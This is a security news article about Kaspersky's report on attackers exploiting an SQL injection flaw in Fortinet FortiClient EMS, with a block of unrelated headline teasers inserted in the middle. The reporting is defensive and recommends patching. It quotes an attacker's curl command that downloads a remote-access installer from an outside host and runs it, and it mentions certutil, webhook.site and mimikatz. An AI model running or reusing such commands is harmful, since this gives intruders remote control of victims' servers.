Tuesday , August 25 2026
Fortinet

CVE-2023-48788
Kaspersky reveals active exploitation of Fortinet Vulnerability

Kaspersky’s Global Emergency Response Team (GERT) found that attackers are exploiting a patched SQL injection vulnerability (CVE-2023-48788) in Fortinet FortiClient EMS, affecting versions 7.0.1 to 7.0.10 and 7.2.0 to 7.2.2. Even with available patches, many systems remain unupdated, allowing unauthorized code execution and compromise of networks.

According to the report, The vulnerability comes from inadequate filtering of SQL input. An attacker can send crafted packets to execute unauthorized commands. It’s especially risky on Windows servers exposed to the internet, as these systems often handle vital functions like secure VPN access for employees.

Chameleon SEO Poisoning
Hackers poison Bing and Google search results to deliver phishing banking pages

Bank customers looking for a login page can now fall into a trap before getting a strange email or text....
Read More
Chameleon SEO Poisoning  Hackers poison Bing and Google search results to deliver phishing banking pages

Mysterious AI model “Ox Alpha” with free 100 trillion tokens a day for coders

A mysterious AI model dubbed "Ox Alpha" has surfaced online and created noise within the developer community after releasing on...
Read More
Mysterious AI model “Ox Alpha” with free 100 trillion tokens a day for coders

After BDJobs, Directorate of Secondary and Higher Education 390k data surfaced online

A group of hackers named “Madarax” claims they have stolen and are offering to sell the personal information of about...
Read More
After BDJobs, Directorate of Secondary and Higher Education 390k data surfaced online

Researchers show new technique to bypass AI safety guardrails in Grok and Gemini

A new hacking technique has been demonstrated to steal data from Elon Musk's Grok AI. It uses a simple trick...
Read More
Researchers show new technique to bypass AI safety guardrails in Grok and Gemini

About thousands of leaked AWS keys Held Full Admin Rights

More than 9,300 AWS access keys that were made public from August 2022 to August 2026 are still active, says...
Read More
About thousands of leaked AWS keys Held Full Admin Rights

US Bank investigates LockBit’s Data Breach Claims

US Bank is looking into LockBit's claims about a breach and stolen data. The ransomware group says they will share...
Read More
US Bank investigates LockBit’s Data Breach Claims

Five new malware families actively targeting Asian Gov.t infra

Central Asian government agencies have been attacked in a cyber spy operation that used a small but different range of...
Read More
Five new malware families actively targeting Asian Gov.t infra

T-Mobile Cuts Cables to Remove Chiness Salt Typhoon Hackers from Network

T-Mobile’s cybersecurity team reportedly physically cut a network cable connecting compromised infrastructure to the outside world. According to Bloomberg, the move...
Read More
T-Mobile Cuts Cables to Remove Chiness Salt Typhoon Hackers from Network

Splunk, Zyxel Patch Multiple Flaws Enabling RCE and Root Command Execution

Splunk has issued security fixes for 17 weaknesses in different apps and add-ons, such as Splunk MCP Server, Splunk AI...
Read More
Splunk, Zyxel Patch Multiple Flaws Enabling RCE and Root Command Execution

“Zombie Card” attack revels expired Visa card may be used for contactless payments

Security experts have shown that expired credit cards can still be used. A study from the University of Massachusetts Amherst,...
Read More
“Zombie Card” attack revels expired Visa card may be used for contactless payments

The attack usually starts by exploiting a vulnerability to install remote monitoring tools like AnyDesk and ScreenConnect. This gives attackers a way to access the network and carry out actions like stealing credentials, moving laterally, and avoiding detection.

In October 2024, GERT analysts discovered a vulnerability being exploited when telemetry alerts showed unauthorized access to registry hives through an admin account on a compromised Windows server. Investigations found that attackers used Base64-encoded payloads and tools like curl and certutil to download malicious installers.

One significant command found in the attackers’ scripts was:

curl -o C:\update.exe “https://infinity.screenconnect.com/Bin/ScreenConnect.ClientSetup.exe” & start /B C:\update.exe & start /B C:\update.exe

The attackers showed adaptability by targeting various organizations, mainly in South America, and used platforms like webhook.site to collect data from vulnerable systems.

Key artifacts identified during the investigation included:

  • Connections to external servers traced to IP addresses associated with previous malicious campaigns.
  • Evidence of credential harvesting tools, such as mimikatz.exe and webbrowserpassview.exe.
  • Suspicious entries in ems.log and sql_trace.log, pointing to SQL injection attempts.

GERT’s findings highlight the need to update FortiClient EMS to versions 7.0.11–7.0.13 or 7.2.3 and later.

U.S. Weighs Ban on Chinese-Made Router TP-Link: WSJ reports

Check Also

Zimbra

Critical Zimbra RCE Flaw Actively Exploited in the Wild

CERT Polska has alerted that bad actors are actively exploiting a security flaw in Zimbra …